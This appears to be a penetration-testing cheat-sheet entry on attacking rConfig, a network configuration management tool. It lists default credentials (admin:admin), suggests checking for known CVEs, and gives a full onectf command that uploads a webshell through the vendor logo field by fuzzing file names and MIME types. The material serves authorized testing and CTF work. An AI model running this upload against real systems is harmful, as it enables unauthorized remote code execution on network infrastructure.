rConfig is a network configuration management tool. At least from the GitHub (0.5k ⭐) repository, it doesn't seem very popular.

  • Look for web interface on port 80
  • Test default credentials admin:admin

Look for well-known CVEs, the version is at the bottom of the page.

If successfully logged, you may try to upload a shell. Navigate to Devices > Vendors, click on Add Vendor and try to exploit the image field. For reference, with onectf:

$ onectf uffuf -u 'https://IP/lib/crud/vendors.crud.php' -v -k --nr -H 'Cookie: PHPSESSID=XXX' -d 'vendorName=onectf&add=add&editid=' -p vendorLogo -F webshell.php -Fn imageFUZZ -Ft image/gif -W .php
[302 or 200] means OK
[301] means KO